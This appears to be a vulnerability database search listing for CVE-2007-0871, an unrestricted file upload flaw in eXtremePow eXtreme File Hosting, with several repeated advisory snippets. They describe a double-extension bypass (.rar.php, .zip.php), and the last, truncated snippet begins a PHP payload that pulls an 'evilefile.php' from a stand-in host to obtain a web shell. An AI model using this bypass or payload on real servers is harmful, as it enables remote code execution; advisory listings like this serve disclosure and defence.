5 matches found
Unrestricted file upload
Unrestricted file upload vulnerability in eXtremePow eXtreme File Hosting allows remote attackers to upload arbitrary PHP code via a filename with a double extension such as 1 .rar.php or 2 .zip.php...
CVE-2007-0871
Unrestricted file upload vulnerability in eXtremePow eXtreme File Hosting allows remote attackers to upload arbitrary PHP code via a filename with a double extension such as 1 .rar.php or 2 .zip.php...
CVE-2007-0871
Unrestricted file upload vulnerability in eXtremePow eXtreme File Hosting allows remote attackers to upload arbitrary PHP code via a filename with a double extension such as 1 .rar.php or 2 .zip.php...
CVE-2007-0871
The CVE-2007-0871 entry concerns the eXtremePow eXtreme File Hosting product, where an unrestricted file upload vulnerability exists. The underlying issue is that an attacker can upload files with double extensions (for example, .rar.php or .zip.php), enabling remote execution of PHP code on the ...
eXtreme File Hosting remote file upload vulnerability
A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell with phpshell. bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain ?php $file = 'http://sample.com/evilefile.php';...